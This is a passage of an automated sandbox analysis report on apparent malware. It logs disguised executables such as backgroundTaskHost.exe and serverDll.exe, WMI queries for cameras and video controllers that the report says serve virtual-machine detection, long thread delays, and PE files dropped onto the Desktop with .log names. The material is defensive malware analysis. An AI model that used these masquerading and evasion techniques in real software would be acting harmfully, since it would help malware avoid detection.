                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\ChainbrowserNet\serverDll.exeMemory allocated: EE0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeMemory allocated: 1A950000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeMemory allocated: 2390000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeMemory allocated: 1A430000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeMemory allocated: 16D0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeMemory allocated: 1B490000 memory reserve | memory write watch
                                    Source: C:\Recovery\Memory Compression.exeMemory allocated: 1020000 memory reserve | memory write watch
                                    Source: C:\Recovery\Memory Compression.exeMemory allocated: 1AC50000 memory reserve | memory write watch
                                    Source: C:\Recovery\Memory Compression.exeMemory allocated: 1A80000 memory reserve | memory write watch
                                    Source: C:\Recovery\Memory Compression.exeMemory allocated: 1B3F0000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\serverDll.exeMemory allocated: 17A0000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\serverDll.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\serverDll.exeMemory allocated: D30000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\serverDll.exeMemory allocated: 1AB00000 memory reserve | memory write watch
                                    Source: C:\Users\Default\Videos\System.exeMemory allocated: 1A20000 memory reserve | memory write watch
                                    Source: C:\Users\Default\Videos\System.exeMemory allocated: 1B590000 memory reserve | memory write watch
                                    Source: C:\Users\Default\Videos\System.exeMemory allocated: FE0000 memory reserve | memory write watch
                                    Source: C:\Users\Default\Videos\System.exeMemory allocated: 1ABA0000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeMemory allocated: AB0000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeMemory allocated: 1A7B0000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\serverDll.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\Memory Compression.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\Memory Compression.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainbrowserNet\serverDll.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainbrowserNet\serverDll.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\Videos\System.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\Videos\System.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 600000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 599871
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 599547
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 3600000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 598891
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 598391
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 597703
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 597500
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 597172
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 596797
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 596469
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 596266
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 595983
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 595750
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 595360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 594875
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 594453
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 594188
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 300000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 593891
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 593701
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 593500
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 593228
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 592937
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 592453
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 592000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 591641
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 591125
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 590625
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 590297
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 589906
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 589281
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 588844
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 588266
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 587902
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 587563
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 586547
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 586156
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 585703
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 585360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 584840
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 584360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 584050
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 583281
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 583028
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582906
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582531
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582281
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582100
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581984
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581864
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581725
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581621
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581487
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581240
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581031
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580875
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580738
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580610
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580485
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580358
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580235
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580037
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579899
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579773
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579669
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579547
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579422
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579312
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579203
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1235Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1457Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1455
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 957
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1220
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1268
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1638
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1269
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1318
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1196
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1567
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1176
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1415
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1045
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1712
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1245
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1747
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1229
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1112
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWindow / User API: threadDelayed 9497
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\dkLAftUN.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\LQcCJUsI.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\yCaEfIsj.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\HBQeAgEO.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\biYRKJQS.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\LxFcNPnz.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\jRHPiNPQ.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\xEzwJIdo.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\LazCtHLF.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\THRskbyw.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\qHLxhtiz.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\NGFBdMTC.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\oHiYBjVt.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\hzjriePQ.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\HQmlqEFC.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\aBvrGPVb.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\hYrhxRdS.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\nQUGZwiG.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\OQqtADLy.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\uhRxJqon.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ermiNMVU.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\YxtBDwFZ.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\diBqqUdY.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\fknZLDhU.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\XpYRNoYk.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\oOwOvwxB.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\zUjwmmDb.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\BnGVmWDc.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\hrAYEvpK.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\WcMTNoOk.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\zkTmQnyh.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\FEoVfgpT.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\WBUJbbcm.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\rEmFCtxu.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\axWajGSg.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\UaZkrFKp.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\sNXxZlqq.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\JYydAytP.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\riqoYKNp.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\kOiXENdL.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\IkuUPlxR.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\OqULzLYx.logJump to dropped file
